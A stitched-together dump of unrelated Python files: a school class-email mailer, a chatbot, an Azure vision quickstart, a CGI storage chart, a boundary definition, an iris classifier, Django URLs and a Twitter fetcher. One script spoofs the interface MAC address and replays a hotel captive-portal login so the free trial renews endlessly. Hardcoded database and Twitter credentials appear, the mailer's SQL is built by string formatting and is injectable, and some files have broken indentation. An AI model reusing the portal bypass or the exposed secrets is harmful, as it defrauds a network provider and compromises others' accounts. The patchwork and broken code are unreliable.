    cursor.execute(sql.format(class_name))
    class_id = cursor.fetchall()[0][0]
    cursor.execute(sql4.format(class_name))
    class_info = list(cursor.fetchall()[0])
    # NULL last_student -> include everyone since the beginning.
    if (class_info[-1] == None):
        class_info[-1] = "0000-00-00 00:00:00"
    cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
    student_ids = cursor.fetchall()
    cursor.execute(sql6.format(class_name))
    last_student = cursor.fetchall()[0][0]
    for i in student_ids:
        cursor.execute(sql3.format(i[0]))
        des_emaux = cursor.fetchall()[0]
        # De-duplicate recipients.
        if (list(des_emaux) not in emails):
            emails.append(list(des_emaux))
        print(i[1])
    # print(final_student)
    # if (i[1] == last_student):
    # print("BREAK")
    # break
    #print(emails)
    class_info[1] = helper_functions.gettime(class_info[1], class_info[2])[0]
    class_info.remove(class_info[2])
    # Operator supplies the shared drive link interactively.
    class_info.insert(1, input("Drive link: "))
    cursor.execute(sql5)
    email_info = cursor.fetchall()[0]
    print(class_info)
    sql_teacher_email = "SELECT email,email,teacher FROM classes WHERE id = '{}'".format(class_id)
    cursor.execute(sql_teacher_email)
    teacher_info = list(cursor.fetchall()[0])
    # NOTE(review): list.append returns None, so this prints None.
    print(emails.append(teacher_info))
    prep_to_send("e3", emails, email_info, class_info)
def e4(class_name, cursor):
    """Send the end-of-class (e4) email, then reset the class row
    (clear final_student, advance last_student, mark not started, clear
    day/dates) so the class can be scheduled again."""
    emails = []
    #send e4
    sql = 'SELECT id FROM classes WHERE short_name = "{}"'
    sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
    sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
    sql4 = 'SELECT name, e4_continuingfurther, teacher, email, name, final_student, last_student FROM classes WHERE short_name = "{}"'
    sql5 = 'SELECT subject, content FROM templates WHERE name="e4"'
    cursor.execute(sql.format(class_name))
    class_id = cursor.fetchall()[0][0]
    cursor.execute(sql4.format(class_name))
    class_info = list(cursor.fetchall()[0])
    # NULL last_student -> include everyone since the beginning.
    if (class_info[-1] == None):
        class_info[-1] = "0000-00-00 00:00:00"
    cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
    student_ids = cursor.fetchall()
    for i in student_ids:
        cursor.execute(sql3.format(i[0]))
        des_emaux = cursor.fetchall()[0]
        # De-duplicate recipients.
        if (list(des_emaux) not in emails):
            emails.append(list(des_emaux))
        print(i[1])
    cursor.execute(sql5)
    email_info = cursor.fetchall()[0]
    print(class_info[-2])
    # Reset the bookkeeping columns so the next run starts clean.
    sql6 = "UPDATE classes SET final_student = null WHERE short_name = '{}'".format(class_name)
    sql7 = "UPDATE classes SET last_student = '{}' WHERE short_name = '{}'".format(class_info[-2], class_name)
    sql8 = "UPDATE classes SET class_started = 0 WHERE short_name = '{}'".format(class_name)
    sql9 = "UPDATE classes SET day = '' WHERE short_name = '{}'".format(class_name)
    sql10 = "UPDATE classes SET startdate = '0000-00-00' WHERE short_name = '{}'".format(class_name)
    sql11 = "UPDATE classes SET enddate = '0000-00-00' WHERE short_name = '{}'".format(class_name)
    cursor.execute(sql6)
    cursor.execute(sql7)
    cursor.execute(sql8)
    cursor.execute(sql9)
    cursor.execute(sql10)
    cursor.execute(sql11)
    #make sure to change the final student and the last student
    #also make sure to change the class_started
    #and the day and week
    print(class_info)
    sql_teacher_email = "SELECT email, email,teacher FROM classes WHERE id = '{}'".format(class_id)
    cursor.execute(sql_teacher_email)
    teacher_info = list(cursor.fetchall()[0])
    # NOTE(review): list.append returns None, so this prints None.
    print(emails.append(teacher_info))
    prep_to_send("e4", emails, email_info, class_info)
def er1(class_name, cursor):
    """Send the class-reminder (er1) email — full schedule and zoom info —
    to students enrolled between `last_student` and `final_student`."""
    emails = []
    sql = 'SELECT id FROM classes WHERE short_name = "{}"'
    sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
    sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
    sql4 = 'SELECT name, day, starttime, endtime, day, startdate, day, enddate, zoom, zoom, e1_additionalwork, teacher, name, final_student, last_student FROM classes WHERE short_name = "{}"'
    sql5 = 'SELECT subject, content FROM templates WHERE name="er1"'
    cursor.execute(sql.format(class_name))
    class_id = cursor.fetchall()[0][0]
    cursor.execute(sql4.format(class_name))
    class_info = list(cursor.fetchall()[0])
    # NULL sentinels: open the window to all enrollments.
    if (class_info[-1] == None):
        class_info[-1] = "0000-00-00 00:00:00"
    if (class_info[-2] == "0000-00-00 00:00:00" or class_info[-2] == None):
        class_info[-2] = "9999-99-99 99:99:99"
    cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
    student_ids = cursor.fetchall()
    for i in student_ids:
        cursor.execute(sql3.format(i[0]))
        des_emaux = cursor.fetchall()[0]
        # De-duplicate recipients.
        if (list(des_emaux) not in emails):
            emails.append(list(des_emaux))
        print(i[1])
    import datetime
    skipclass = None
    # Note any holiday week that falls inside the class window.
    for i in skipping_weeks:
        if class_info[5] < datetime.date(i[0], i[1], i[2]) and class_info[7] > datetime.date(i[0], i[1], i[2]):
            skipclass = "5 Weeks, once per week)<br><strong>{}</strong>".format(i[3])
    if "weeklong" in class_info[1]:
        class_info[1] = "Monday"
        class_info[4] = "Monday"
        class_info[6] = "Friday"
    # Convert stored times/dates into display strings.
    est = helper_functions.gettime(class_info[2], class_info[3])[0]
    cst = helper_functions.gettime(class_info[2], class_info[3])[1]
    class_info[2] = est
    class_info[3] = cst
    stime = helper_functions.getdate(class_info[5], class_info[7])[0]
    etime = helper_functions.getdate(class_info[5], class_info[7])[1]
    class_info[5] = stime
    class_info[7] = etime
    # Drop the final_student / last_student bookkeeping columns.
    class_info.remove(class_info[-2])
    class_info.remove(class_info[-1])
    cursor.execute(sql5)
    email_info = cursor.fetchall()[0]
    # print(class_info)
    sql_teacher_email = "SELECT email, email,teacher FROM classes WHERE id = '{}'".format(class_id)
    cursor.execute(sql_teacher_email)
    teacher_info = list(cursor.fetchall()[0])
    emails.append(teacher_info)
    prep_to_send("er1", emails, email_info, class_info, qwert=[skipclass])
def er2(class_name, cursor):
    """Send the day-of reminder (er2) email — zoom link only — to students
    enrolled between `last_student` and `final_student`."""
    emails = []
    sql = 'SELECT id FROM classes WHERE short_name = "{}"'
    sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
    sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
    sql4 = 'SELECT short_name, zoom, zoom, teacher, name, final_student, last_student FROM classes WHERE short_name = "{}"'
    sql5 = 'SELECT subject, content FROM templates WHERE name="er2"'
    cursor.execute(sql.format(class_name))
    class_id = cursor.fetchall()[0][0]
    cursor.execute(sql4.format(class_name))
    class_info = list(cursor.fetchall()[0])
    # NULL sentinels: open the window to all enrollments.
    if (class_info[-1] == None):
        class_info[-1] = "0000-00-00 00:00:00"
    if (class_info[-2] == "0000-00-00 00:00:00" or class_info[-2] == None):
        class_info[-2] = "9999-99-99 99:99:99"
    cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
    student_ids = cursor.fetchall()
    for i in student_ids:
        cursor.execute(sql3.format(i[0]))
        des_emaux = cursor.fetchall()[0]
        # De-duplicate recipients.
        if (list(des_emaux) not in emails):
            emails.append(list(des_emaux))
        print(i[1])
    # Drop the final_student / last_student bookkeeping columns.
    class_info.remove(class_info[-2])
    class_info.remove(class_info[-1])
    cursor.execute(sql5)
    email_info = cursor.fetchall()[0]
    # print(class_info)
    # NOTE(review): a __main__ guard inside a function looks like a stray
    # paste; it only fires when er2 is called from this script directly.
    if __name__ == "__main__":
        run_class_starting = input("Run class_starting.py? ")
        if run_class_starting.lower() == "yes":
            import class_starting
    sql_teacher_email = "SELECT email, email,teacher FROM classes WHERE id = '{}'".format(class_id)
    cursor.execute(sql_teacher_email)
    teacher_info = list(cursor.fetchall()[0])
    emails.append(teacher_info)
    prep_to_send("er2", emails, email_info, class_info)
def ge(class_name, cursor):
    """Print and return the de-duplicated (student, parent, name) rows for
    students enrolled in `class_name` between the bookkeeping timestamps.

    Unlike the e*/er* helpers this sends nothing — it is "get emails".
    """
    emails = []
    sql = 'SELECT id FROM classes WHERE short_name = "{}"'
    sql4 = 'SELECT final_student, last_student FROM classes WHERE short_name = "{}"'
    sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
    sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
    cursor.execute(sql.format(class_name))
    class_id = cursor.fetchall()[0][0]
    cursor.execute(sql4.format(class_name))
    class_info = list(cursor.fetchall()[0])
    # NULL sentinels: open the window to all enrollments.
    if (class_info[-1] == None):
        class_info[-1] = "0000-00-00 00:00:00"
    if (class_info[-2] == "0000-00-00 00:00:00" or class_info[-2] == None):
        class_info[-2] = "9999-99-99 99:99:99"
    cursor.execute(sql2.format(class_id, class_info[-1], class_info[-2]))
    student_ids = cursor.fetchall()
    for i in student_ids:
        cursor.execute(sql3.format(i[0]))
        e = cursor.fetchall()[0]
        if (list(e) not in emails):
            emails.append(list(e))
    for i in emails:
        print(i[0])
        print(i[1])
    #input("good?")
    return emails
def prep_to_send(email_to_send, emails, email_info, class_info=[], welcome_classinfo=[], waitlist_emails=[], qwert=[1], waitlist_emailinfo=[], waitlist_classinfo=[]):
    """Preview the recipient list, confirm interactively when run as a
    script, then send the chosen template to each (student, parent) pair.

    NOTE(review): the mutable default arguments ([], [1]) are only read
    here (class_info is re-bound to a copy before mutation), so they are
    harmless — but a latent footgun.  For "esa", qwert is a dict mapping
    student email -> class short name; for e1/er1 a one-element list whose
    value appears unused on this path — confirm intent.
    """
    if (email_to_send != "e2"):
        # Work on a copy and blank out NULL fields so str.format never
        # renders "None".
        class_info = list(class_info)
        for c in range(0, len(class_info)):
            if class_info[c] == None:
                class_info[c] = ""
    for j in emails:
        print(j)
    if __name__ == "__main__":
        input("Send?")
    for j in emails:
        print(j[0])
        print(j[1])
        print(j[2])
        if (email_to_send == "e1" or email_to_send == "esa" or email_to_send == "e3" or email_to_send == "e4" or email_to_send == "er1" or email_to_send == "er2"):
            if (email_to_send == "esa"):
                class_info[1] = j[3]
                send(email_to_send, email_info[0], email_info[1], j[2], j[0], j[1], class_info, extra_content=qwert[j[0]])
            else:
                print("\n\n\n%s\n\n\n" % class_info)
                send(email_to_send, email_info[0], email_info[1], j[2], j[0], j[1], class_info)
        elif (email_to_send == "e2"):
            # e2 recipients get the welcome (e1) template body.
            print("\n\n\n%s\n\n\n" % welcome_classinfo)
            send("e1", email_info[0], email_info[1], j[2], j[0], j[1], welcome_classinfo)
    if (email_to_send == "e2"):
        for j in waitlist_emails:
            print(j)
        if __name__ == "__main__":
            input("Send??")
        for j in waitlist_emails:
            print("Waitlist")
            print(j[0])
            print(j[1])
            send(email_to_send, waitlist_emailinfo[0], waitlist_emailinfo[1], j[2], j[0], j[1], waitlist_classinfo)
    print("\nEmails not sent: ")
#tutorial at https://realpython.com/python-send-email/
#tutorial at https://realpython.com/python-send-email/
if __name__ == "__main__":
    # Interactive dispatcher: open the DB, ask which template to send for
    # which class, run the matching handler, then report failures.
    db = "HELM_Database"
    cnx = create_connection()
    cursor = cnx.cursor(buffered=True)
    email_to_send = input("E1, E2, E3, E4, ESA, ER1, ER2, Get Emails? ").lower()
    class_name = input("class?").lower()
    # Capitalise to match the short_name convention in the DB.
    class_name = class_name[0].upper() + class_name[1:]
    if (email_to_send == "e1"):
        e1(class_name, cursor)
    elif (email_to_send == "e2"):
        e2(class_name, cursor)
    elif (email_to_send == "e3"):
        e3(class_name, cursor)
    elif (email_to_send == "e4"):
        e4(class_name, cursor)
    elif (email_to_send == "esa"):
        esa(class_name, cursor)
    elif (email_to_send == "er1"):
        er1(class_name, cursor)
    elif (email_to_send == "er2"):
        er2(class_name, cursor)
    elif (email_to_send == "ge"):
        ge(class_name, cursor)
    else:
        print("You're bad and you should feel bad about yourself")
    # Report any recipients that failed during send().
    for i in not_sent_emails:
        print(i)
    cnx.commit()
    cursor.close()
    cnx.close()
# final student for Python 5 week class: 2020-12-05 20:26:44
# last student for Py: 2020-08-09 20:38:18
# last student: 2020-12-05 20:26:44
|
# Canned question -> reply pairs for the chatbot (keys are the recognised
# user phrases, in Russian).
answers = {'привет':'Привет',
'как дела': 'Хорошо',
'что делаешь': 'Программирую'
}
def get_answer(question, answers):
    """Return the canned reply for *question*, or None when unknown."""
    try:
        return answers[question]
    except KeyError:
        return None
def ask_user(answers):
    """Interactive chat loop: read phrases until the user says 'пока'
    or presses Ctrl-C."""
    while True:
        try:
            user_say = input('Скажи что-нибудь:')
            if user_say == 'пока':
                print('До встречи')
                break
            reply = get_answer(user_say, answers)
            # Unknown phrases get echoed back as a taunt.
            print(f'Сам ты {user_say}' if reply is None else reply)
        except KeyboardInterrupt:
            print('Пока!')
            break
if __name__ == '__main__':
ask_user(answers) |
from azure.cognitiveservices.vision.computervision import ComputerVisionClient
from azure.cognitiveservices.vision.computervision.models import OperationStatusCodes
from azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes
from msrest.authentication import CognitiveServicesCredentials
from array import array
import os
from PIL import Image
import sys
import time
from dotenv import load_dotenv
# Path to the local image analysed by every section below.
local_image_path = "resources/helicopter.jpg"
# Pull the Cognitive Services key/endpoint from a .env file.
load_dotenv()
subscription_key = os.getenv('dchwcogsaccountkey')
endpoint = os.getenv('dchwcogsaccountendpoint')
computervision_client = ComputerVisionClient(endpoint, CognitiveServicesCredentials(subscription_key))
'''
Describe an Image - local
This example describes the contents of an image with the confidence score.
'''
print("===== Describe an Image =====")
# Context manager closes the file handle (the original opened the image
# in each section and never closed it).
with open(local_image_path, "rb") as local_image:
    description_result = computervision_client.describe_image_in_stream(local_image)
print("Description of local image: ")
if (len(description_result.captions) == 0):
    print("No description detected.")
else:
    for caption in description_result.captions:
        print("'{}' with confidence {:.2f}%".format(caption.text, caption.confidence * 100))
print()
'''
END - Describe an Image - local
'''
'''
Categorize an Image - local
This example extracts categories from a local image with a confidence score
'''
print("===== Categorize an Image =====")
with open(local_image_path, "rb") as local_image:
    local_image_features = ["categories"]
    categorize_results_local = computervision_client.analyze_image_in_stream(local_image, local_image_features)
print("Categories from local image: ")
if (len(categorize_results_local.categories) == 0):
    print("No categories detected.")
else:
    for category in categorize_results_local.categories:
        print("'{}' with confidence {:.2f}%".format(category.name, category.score * 100))
print()
'''
END - Categorize an Image - local
'''
'''
Tag an Image - local
This example returns a tag (key word) for each thing in the image.
'''
print("===== Tag an Image =====")
with open(local_image_path, "rb") as local_image:
    tags_result_local = computervision_client.tag_image_in_stream(local_image)
print("Tags in the local image: ")
if (len(tags_result_local.tags) == 0):
    print("No tags detected.")
else:
    for tag in tags_result_local.tags:
        print("'{}' with confidence {:.2f}%".format(tag.name, tag.confidence * 100))
print()
'''
END - Tag an Image - local
'''
'''
Detect Color - local
This example detects the different aspects of its color scheme in a local image.
'''
print("===== Detect Color =====")
# Context manager closes the file handle (the original leaked it).
with open(local_image_path, "rb") as local_image:
    local_image_features = ["color"]
    detect_color_results_local = computervision_client.analyze_image_in_stream(local_image, local_image_features)
print("Getting color scheme of the local image: ")
print("Is black and white: {}".format(detect_color_results_local.color.is_bw_img))
print("Accent color: {}".format(detect_color_results_local.color.accent_color))
print("Dominant background color: {}".format(detect_color_results_local.color.dominant_color_background))
print("Dominant foreground color: {}".format(detect_color_results_local.color.dominant_color_foreground))
print("Dominant colors: {}".format(detect_color_results_local.color.dominant_colors))
print()
'''
END - Detect Color - local
'''
'''
Detect Objects - local
This example detects different kinds of objects with bounding boxes in a local image.
'''
print("===== Detect Objects =====")
with open(local_image_path, "rb") as local_image_objects:
    detect_objects_results_local = computervision_client.detect_objects_in_stream(local_image_objects)
print("Detecting objects in local image:")
if len(detect_objects_results_local.objects) == 0:
    print("No objects detected.")
else:
    # Loop variable renamed from `object`, which shadowed the builtin.
    for detected in detect_objects_results_local.objects:
        print("object at location {}, {}, {}, {}".format(
            detected.rectangle.x, detected.rectangle.x + detected.rectangle.w,
            detected.rectangle.y, detected.rectangle.y + detected.rectangle.h))
print()
'''
END - Detect Objects - local
'''
'''
Generate Thumbnail
This example creates a thumbnail.
'''
print("===== Generate Thumbnail =====")
# Keep the source image open while the thumbnail generator is consumed;
# both files are closed by the context managers (the original leaked the
# source handle).
with open(local_image_path, "rb") as local_image_thumb:
    print("Generating thumbnail from a local image...")
    # Call the API with a local image, set the width/height if desired (pixels)
    # Returns a Generator object, a thumbnail image binary (list).
    thumb_local = computervision_client.generate_thumbnail_in_stream(100, 100, local_image_thumb, True)
    # Write the image binary to file
    with open("resources/thumb.png", "wb") as f:
        for chunk in thumb_local:
            f.write(chunk)
# Uncomment/use this if you are writing many images as thumbnails from a list
# for i, image in enumerate(thumb_local, start=0):
#     with open('thumb_{0}.jpg'.format(i), 'wb') as f:
#         f.write(image)
print("Thumbnail saved to local folder.")
print()
'''
END - Generate Thumbnail
'''
'''
Recognize Printed Text with OCR - local
This example will extract, using OCR, printed text in an image, then print results line by line.
'''
print("===== Detect Printed Text with OCR =====")
with open(local_image_path, "rb") as local_image_printed_text:
    ocr_result_local = computervision_client.recognize_printed_text_in_stream(local_image_printed_text)
for region in ocr_result_local.regions:
    for line in region.lines:
        print("Bounding box: {}".format(line.bounding_box))
        s = ""
        for word in line.words:
            s += word.text + " "
        print(s)
print()
'''
END - Recognize Printed Text with OCR - local
'''
print("End of Computer Vision quickstart.")
|
#!C:\Python27\python.exe
#-*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import matplotlib as mpl
import pandas as pd
import numpy as np
import cgi
import cgitb
import mpld3 as d3
import sqlalchemy as sql
import sys
# Python 2 hack: re-expose sys.setdefaultencoding so DB strings decode
# as UTF-8 by default.
reload(sys)
sys.setdefaultencoding('utf8')
# Render tracebacks as HTML in the browser (CGI debugging aid).
cgitb.enable()
#form=cgi.FieldStorage()
#formm=form.getvalue('kind')
formm="pie"
# SECURITY: DB credentials are hardcoded in the connection URL.
conn=sql.create_engine('mysql://inzent:1q2w3e4r!@inzent.cyuky5umqyhf.ap-northeast-2.rds.amazonaws.com:3306/inzent?charset=utf8')
query=pd.read_sql("select MAXSPACE-SPACELEFT, SPACELEFT from ASYSVOLUME", conn)
# Convert bytes to GiB (1073741824 = 2**30), 3 decimal places.
# NOTE(review): under Python 2 this is integer division if the column is
# an int dtype — confirm the values keep their fraction.
using1=round(query.iloc[0][0]/1073741824,3)
remain1=round(query.iloc[0][1]/1073741824,3)
using2=round(query.iloc[1][0]/1073741824,3)
remain2=round(query.iloc[1][1]/1073741824,3)
ul0=[using1+using2, remain1+remain2]
label=['using','remain']
a=plt.figure()
DPI = a.get_dpi()
# Size the figure in pixels (2300x800) regardless of DPI.
a.set_size_inches(2300.0/float(DPI),800.0/float(DPI))
plt.style.use('fivethirtyeight')
mpl.rcParams['font.size']=20
if formm=="pie" :
    ul1=[using1, remain1]
    ul2=[using2, remain2]
    # Three pies: Total (left), storage1 (middle), storage2 (right).
    plt.subplot(132, facecolor="none")
    plt.pie(ul1, labels=[str(using1)+'GB', str(remain1)+'GB'], autopct='%1.1f%%')
    plt.title('storage1')
    plt.subplot(133, facecolor="none")
    plt.pie(ul2, labels=[str(using2)+'GB', str(remain2)+'GB'], autopct='%1.1f%%')
    plt.title('storage2')
    plt.subplot(131, facecolor="none")
    plt.pie(ul0, labels=[str(ul0[0])+'GB', str(ul0[1])+'GB'], autopct='%1.1f%%')
    plt.title('Total')
    plt.legend(label, loc="upper left")
elif formm=="bar":
archive=['Total', 'storage1', 'storage2']
ind=[x for x, _ in enumerate(archive)]
using=np.array([using1+using2, using1, using2])
remain=np.array([remain1+remain2, remain1, remain2])
total=using+remain
pro_using=np.true_divide(using, total)*100
pro_remain=np.true_divide(remain, total)*100
plt.subplot(facecolor="none")
plt.bar(ind, pro_using, width=0.4, bottom=pro_remain)
plt.bar(ind, pro_remain, width=0.4)
plt.xticks(ind, archive)
plt.ylim=1.0
plt.legend(label, loc="lower left")
for i,j in zip(ind, remain):
plt.annotate(str(j)+'GB',xy=(i-0.05,pro_remain[i]-5))
plt.annotate(format(pro_remain[i],'1.1f')+'%',xy=(i-0.025,pro_remain[i]-10))
for i,j in zip(ind, using):
plt.annotate(str(j)+'GB',xy=(i-0.05,95))
plt.annotate(format(pro_using[i],'1.1f')+'%',xy=(i-0.025,90))
# Emit the CGI response: content-type header, then the mpld3-rendered
# interactive figure as HTML (Python 2 print statements).
print 'Content-type: text/html;\n'
print d3.fig_to_html(a)
|
#coding: utf-8
from datetime import date
import boundaries
# Boundary definition for Pointe-Claire electoral districts, sourced from
# the Ville de Montréal 2009 districts open-data shapefile.
boundaries.register(u'Pointe-Claire districts',
    domain=u'Pointe-Claire, QC',
    last_updated=date(2013, 8, 21),
    name_func=boundaries.clean_attr('NOM_DISTRI'),
    authority=u'Ville de Montréal',
    source_url='http://donnees.ville.montreal.qc.ca/fiche/elections-2009-districts/',
    licence_url='http://donnees.ville.montreal.qc.ca/licence/licence-texte-complet/',
    data_url='http://depot.ville.montreal.qc.ca/elections-2009-districts/multi-poly/data.zip',
    encoding='iso-8859-1',
    metadata={'geographic_code': '2466097'},
    # BUG FIX: ogr2ogr applies only the last -where flag, so the original
    # two separate -where clauses silently dropped the MONTREAL filter;
    # combine both conditions into a single clause.
    ogr2ogr='''-where "MONTREAL='0' AND NUM_ARR='8'"''',
)
|
from __future__ import print_function
import argparse
import random
import re
import subprocess
import sys
import time
import requests
PORTAL_URL = 'https://portal.reivernet.com/'
def set_mac(interface, mac):
    """Set `interface`'s MAC address to `mac` via ifconfig.

    Returns True on success and False if ifconfig failed (typically
    permission denied). Callers test the result with `is False`.
    """
    try:
        subprocess.check_call(['ifconfig', interface, 'ether', mac])
    except subprocess.CalledProcessError:
        return False
    # BUG FIX: previously fell through returning None on success; return
    # True explicitly (backward compatible with the `is False` check).
    return True
def get_default_mac(interface):
    """Return the 'burned-in' MAC address of `interface`.

    Parses `networksetup -getmacaddress` output; returns None when no
    Ethernet address line is found.
    """
    output = subprocess.check_output(
        ['networksetup', '-getmacaddress', interface], universal_newlines=True)
    # BUG FIX: the original called .format(interface) on a pattern with no
    # placeholders — a no-op; the literal pattern is sufficient.
    match_object = re.search(r'^Ethernet Address: ([\w:]+)', output)
    if match_object:
        return match_object.group(1)
    return None
def generate_mac(mac):
    """Return `mac` with its last 24 bits (three bytes) randomized.

    The vendor prefix (first three bytes) is preserved unchanged.
    """
    vendor_prefix = mac.split(':')[:3]
    random_tail = ['{:02x}'.format(random.randint(0, 255)) for _ in range(3)]
    return ':'.join(vendor_prefix + random_tail)
def toggle_interface_status(interface):
    """Bounce `interface`: bring it down, then back up.

    Sleeps one second before each state change to let the OS settle.
    """
    for state in ('down', 'up'):
        time.sleep(1)
        subprocess.call(['ifconfig', interface, state])
def change_mac(interface):
    """Randomize `interface`'s MAC address, then bounce the interface.

    Exits the process with a helpful message when the MAC cannot be set
    (requires root privileges).
    """
    randomized = generate_mac(get_default_mac(interface))
    if set_mac(interface, randomized) is False:
        sys.exit('Could not set MAC address. Run with sudo.')
    toggle_interface_status(interface)
    print("Set {interface}'s MAC to {mac}".format(
        interface=interface, mac=randomized))
def start_trial_session(guest_name, room_number):
    """Start a new Reivernet 30-minute trial session.

    Replays the captive portal's login flow: warm up the session, open the
    login form, submit the guest details, then accept the terms on the
    free-trial plan (radio_plan '17').
    """
    s = requests.Session()
    # Initial GETs establish the portal session cookies.
    s.get(PORTAL_URL)
    s.get(PORTAL_URL, params='useLogin')
    # NOTE(review): both POSTs send the form fields as URL query parameters
    # (`params=`) rather than as a form body (`data=`). The portal evidently
    # accepts this; confirm before "fixing" it.
    s.post(PORTAL_URL, params={
        'guestname': guest_name,
        'room': room_number,
        'authUser': '',
        'portID': '1'
    })
    s.post(PORTAL_URL + 'Accept.php', params={
        'radio_plan': '17',
        'room': room_number,
        'guestname': guest_name,
        'reservation': '',
        'authUser': '',
        'Accept': 'accept',
        'connect_btn': 'Connect'
    })
    print('Logged in as {}, room {}.'.format(guest_name, room_number))
def renew_session(interface, guest_name, room_number):
    """Renew the internet session under a freshly randomized MAC."""
    change_mac(interface)
    time.sleep(10)  # allow time for the interface to come back up
    start_trial_session(guest_name, room_number)
def _parse_args():
    """Parse and return the command-line arguments."""
    parser = argparse.ArgumentParser(
        description='Renew Reivernet internet session.')
    parser.add_argument('interface', help='network interface')
    parser.add_argument('guest_name', help="registered guest's name")
    parser.add_argument('room_number', help="guest's room number")
    parser.add_argument('-a', '--auto', action='store_true',
                        help='automatically renew the session periodically')
    parser.add_argument('-m', '--minutes', default=28, type=int,
                        help='specify how many minutes to wait before '
                             'automatically renewing the session (default '
                             '%(default)s minutes)')
    return parser.parse_args()
def main():
    """Renew the session once, then (with --auto) keep renewing forever."""
    args = _parse_args()
    sleep_time = args.minutes * 60
    # Renew the session once up front.
    renew_session(args.interface, args.guest_name, args.room_number)
    # In auto mode, keep renewing until the user interrupts.
    if args.auto:
        print('Press Ctrl-C to exit.')
        try:
            while True:
                print('Sleeping for {} minutes (until {}).'.format(
                    args.minutes, time.ctime(time.time() + sleep_time)))
                time.sleep(sleep_time)
                renew_session(args.interface, args.guest_name, args.room_number)
        except KeyboardInterrupt:
            print('Exiting.')
# Standard script entry point.
if __name__ == '__main__':
    main()
|
# Read an integer and report whether it is even or odd.
numero = int(input('Digite um número: '))
resto = numero % 2
print(resto)
if resto == 0:
    print(f'O número {numero} é par')
else:
    print(f'O número {numero} é ímpar')
|
from sklearn import datasets
import numpy as np
from sklearn.model_selection import train_test_split
# Load iris and pull out petal length (feature column 2) for each species.
iris = datasets.load_iris()
setosa = np.array(iris.data[:50, 2])
versicolor = np.array(iris.data[50:100, 2])
virginica = np.array(iris.data[100:150, 2])
# Hold out 30% of the data for validation.
X_train, X_validation, y_train, y_validation = train_test_split(iris.data, iris.target, test_size=0.3)
# Per-class petal-length means.
# BUG FIX: the mean_0 assignment was duplicated; the copy was removed.
mean_0 = (sum(setosa)) / setosa.size
mean_1 = (sum(versicolor)) / versicolor.size
mean_2 = (sum(virginica)) / virginica.size
# NOTE(review): these hold VARIANCES (ndarray.var), not standard deviations,
# despite the sd_* names — and f() squares them again. Confirm whether
# .std() was intended before changing the math; kept as-is for now.
sd_0 = setosa.var()
sd_1 = versicolor.var()
sd_2 = virginica.var()
means = [mean_0, mean_1, mean_2]
sds = [sd_0, sd_1, sd_2]
def f(x, mean, sd):
    """Gaussian density at x for the given mean and (nominal) sd."""
    coeff = 1 / np.sqrt(2 * np.pi * (sd ** 2))
    exponent = -((x - mean) ** 2) / (2 * (sd ** 2))
    return coeff * np.e ** exponent
def posterior(x, means, sds, i):
    """Posterior probability of class i for x, assuming equal priors.

    The evidence term sums the class-conditional densities over the
    three classes.
    """
    evidence = sum(f(x, means[k], sds[k]) for k in range(3))
    return f(x, means[i], sds[i]) / evidence
def classify(x, means, sds):
    """Return the class index (0, 1 or 2) with the highest posterior for x.

    Ties fall through to class 2, matching the original comparison order.
    """
    p0, p1, p2 = (posterior(x, means, sds, c) for c in range(3))
    if p0 > p1 and p0 > p2:
        return 0
    if p1 > p0 and p1 > p2:
        return 1
    return 2
def validate(X_validation, target, means, sds):
    """Classify every validation sample and return the accuracy in percent.

    Prints each (prediction, target) pair as a side effect.
    """
    correct = 0
    for idx in range(X_validation.size):
        guess = classify(X_validation[idx], means, sds)
        print(guess, " ", target[idx])
        if guess == target[idx]:
            correct = correct + 1
    return (correct / X_validation.size) * 100
# STUDENT: overall accuracy on the held-out petal-length column.
accuracy = validate(X_validation[:, 2], y_validation, means, sds)
print(accuracy)
# Spot-check the classifier on a single training flower.
flower_id = 8
predicted_class = classify(X_train[flower_id, 2], means, sds)
print("Predicted class", iris.target_names[predicted_class])
print("Flower belongs to class", iris.target_names[y_train[flower_id]])
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
    # Examples:
    # url(r'^$', 'trains.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    url(r'^admin/', include(admin.site.urls)),
    # BUG FIX: unresolved git merge-conflict markers (<<<<<<< / ======= /
    # >>>>>>>) made this module a syntax error. Both branches routed to
    # contest.urls under slightly different prefixes; keep both spellings
    # so URLs from either branch continue to resolve.
    url(r'^contests/', include('contest.urls')),
    url(r'^contest/', include('contest.urls')),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import twitter
# SECURITY NOTE(review): live API credentials are committed in plain text
# below. Revoke these tokens and load replacements from environment
# variables or an untracked config file.
CONSUMER_KEY="Tf0llJkFekN0fQRs3jm8D64BV"
CONSUMER_SECRET="iI909hsiksvYfotc9Ra8EPeA8dpCjShB6E2BlmDK31bu1hfLnd"
ACCESS_TOKEN_KEY="952559428619898881-Cimwl8COh51kdsM04xkxNN3mMV8Oy0n"
ACCESS_TOKEN_SECRET="66wC1hUBRI1kO0S5Wvj7vLYhBoKQCIPHQmx0vFFJwuJgw"
# Twitter handle whose timeline is fetched.
USER_NAME='FilipeDeschamps'
api = twitter.Api(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
# Fetch and dump the user's most recent tweets.
statuses = api.GetUserTimeline(screen_name=USER_NAME)
print(statuses)
class Stationery:
    """Base class for drawable stationery items."""

    def __init__(self, title='Stationery'):
        # Display name reported by subclasses when drawing.
        self.title = title

    def draw(self):
        """Generic draw stub; subclasses print richer messages."""
